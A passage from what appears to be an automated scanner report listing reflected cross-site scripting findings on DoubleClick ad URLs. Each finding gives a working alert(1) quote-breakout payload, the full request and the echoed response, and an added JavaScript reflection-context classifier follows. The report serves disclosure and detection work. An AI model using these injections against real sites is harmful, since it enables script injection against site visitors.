Content-Length: 7736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 20 16:08:37
...[SNIP]...
375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,478054304a"-alert(1)-"cda7ed7f77b&Values=1589&Redirect=http%3a%2f%2fwww.ibm.com/innovation/us/leadership/hospitals/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20101213%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadhosp");
va
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6db"-alert(1)-"ee09ebde4b3 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211cb6db"-alert(1)-"ee09ebde4b3&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:45:59 GMT
Expires: Wed, 23 Mar 2011 19:45:59 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 20 16:08:37
...[SNIP]...
click%3Bh%3Dv8/3ad3/f/1eb/%2a/n%3B233540379%3B1-0%3B0%3B57088445%3B3454-728/90%3B39920662/39938449/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211cb6db"-alert(1)-"ee09ebde4b3&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,422
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8474b"-alert(1)-"44fd70d9e1a was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15898474b"-alert(1)-"44fd70d9e1a&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:46:55 GMT
Expires: Wed, 23 Mar 2011 19:46:55 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7714

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Mar 08 09:18:11
...[SNIP]...
423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15898474b"-alert(1)-"44fd70d9e1a&Redirect=http%3a%2f%2fwww.ibm.com/innovation/us/leadership/response/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20110307%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadmadrid");
var fscUrl =
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The scanner attributes this issue to the sz request parameter, but the request below shows the payload 7ed9b"-alert(1)-"f9a28dd4132 appended to the Type=click value at the start of the click= URL, not to sz=728x90; the semicolon-delimited path segments make the parameter attribution unreliable. The injected value is copied, unmodified, into the same double-quoted JavaScript string (var url = escape("...")) as in the other findings for this path.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click7ed9b"-alert(1)-"f9a28dd4132&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:44:16 GMT
Expires: Wed, 23 Mar 2011 19:44:16 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 20 16:08:37
...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/n%3B233540379%3B1-0%3B0%3B57088445%3B3454-728/90%3B39920662/39938449/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click7ed9b"-alert(1)-"f9a28dd4132&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,3
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter (the parameter is PID; the leading ampersand comes from the doubled "?!&&PID=" in the click-through URL) is copied into a JavaScript string which is encapsulated in single quotation marks: the document.write('...') argument that carries the ad markup, inside which double quotes are already escaped as \" but a bare single quote is not. The payload 465d9'-alert(1)-'6e4ac7352f1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962465d9'-alert(1)-'6e4ac7352f1&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:39 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962465d9'-alert(1)-'6e4ac7352f1&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter (again PID; see 1.27) is also copied into a second JavaScript string, this one encapsulated in double quotation marks: var url = escape("..."). The payload 1f478"-alert(1)-"6eea3e74b0f was submitted in the &PID parameter. This input was echoed unmodified in the application's response, so the same value breaks out of both a single-quoted and a double-quoted literal depending on which quote it carries.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=81349621f478"-alert(1)-"6eea3e74b0f&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:35 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
lider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=81349621f478"-alert(1)-"6eea3e74b0f&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354da'-alert(1)-'5924229b624 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616354da'-alert(1)-'5924229b624&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:05 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616354da'-alert(1)-'5924229b624&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f56ab"-alert(1)-"142e0c6b3d9 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616f56ab"-alert(1)-"142e0c6b3d9&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:00 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
ar minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616f56ab"-alert(1)-"142e0c6b3d9&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d9e5'-alert(1)-'012306d0300 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106376d9e5'-alert(1)-'012306d0300&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:36 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106376d9e5'-alert(1)-'012306d0300&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be26"-alert(1)-"8859d5c8fb3 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106378be26"-alert(1)-"8859d5c8fb3&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:28 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106378be26"-alert(1)-"8859d5c8fb3&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...
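
Each "Issue detail" paragraph in this report rests on two observations: the marker payload comes back byte-for-byte, and it lands inside a string whose delimiter it carries. The following is an added example, not code from the XSS.CX report or from the scanner that produced it, showing how to make that determination from a response body. The sample bodies are constructed excerpts modelled on findings 1.32, 1.33 and (later in this report) 1.43; it assumes the scanned script uses no regex literals or template strings outside of string literals, so a quote-tracking tokeniser is enough.

```javascript
// Added example, not code from the XSS.CX report or its scanner: locate a
// reflected marker payload and classify the context it landed in.

// Tokenise JavaScript source up to `end` and return the quote character of the
// string literal still open there, or null when `end` is in code or a comment.
// Backslash escapes are honoured, so the \" inside document.write('...') does
// not close the single-quoted literal. Assumption: no regex/template literals.
function jsStringState(src, end) {
  let quote = null;
  for (let i = 0; i < end; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') i++;                  // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
    } else if (c === '/' && src[i + 1] === '/') {
      const nl = src.indexOf('\n', i);
      if (nl < 0 || nl >= end) return null; // `end` is inside the comment
      i = nl;
    } else if (c === '/' && src[i + 1] === '*') {
      const close = src.indexOf('*/', i + 2);
      if (close < 0 || close >= end) return null;
      i = close + 1;
    }
  }
  return quote;
}

// For an HTML body: if `end` is inside a tag, return the quote character of the
// attribute value still open there; null for a text node or unquoted value.
function htmlAttrState(src, end) {
  const tagStart = src.lastIndexOf('<', end);
  if (tagStart < 0) return null;
  const tagEnd = src.indexOf('>', tagStart);
  if (tagEnd !== -1 && tagEnd < end) return null;   // last tag already closed
  let quote = null;
  for (let i = tagStart; i < end; i++) {
    const c = src[i];
    if (quote) {
      if (c === quote) quote = null;
    } else if ((c === '"' || c === "'") && src[i - 1] === '=') {
      quote = c;
    }
  }
  return quote;
}

// `payload` is the unique marker that was submitted, e.g. 8be26"-alert(1)-"8859d5c8fb3.
// It breaks out only when it carries the quote character that encloses it;
// checking the echo alone, without the quote match, over-reports.
function classifyReflection(body, payload, contentType) {
  const at = body.indexOf(payload);
  if (at < 0) return { reflected: false, context: null, breaksOut: false };
  const isScript = /javascript/i.test(contentType);
  const quote = isScript ? jsStringState(body, at) : htmlAttrState(body, at);
  const context = quote === null ? 'unknown'
    : (isScript ? 'js-string-' : 'html-attr-') + (quote === '"' ? 'double' : 'single');
  return { reflected: true, context, breaksOut: quote !== null && payload.includes(quote) };
}

// Constructed response excerpts modelled on findings 1.32, 1.33 and 1.43;
// the real bodies are several KB of ad template.
const SAMPLES = {
  asid: {   // 1.32: inside var url = escape("...")
    contentType: 'application/x-javascript',
    payload: '8be26"-alert(1)-"8859d5c8fb3',
    body: String.raw`document.write('<!-- Template Id = 2,594 --><script src=\"http://s0.2mdn.net/x.js\"><\/script> ');
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?PG=NBCRM4&ASID=d146d58be26"-alert(1)-"8859d5c8fb3&destination=");
`,
  },
  pg: {     // 1.33: inside the single-quoted document.write argument
    contentType: 'application/x-javascript',
    payload: "48f6a'-alert(1)-'dc0d0d0b99c",
    body: String.raw`document.write('<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d5\">');
`,
  },
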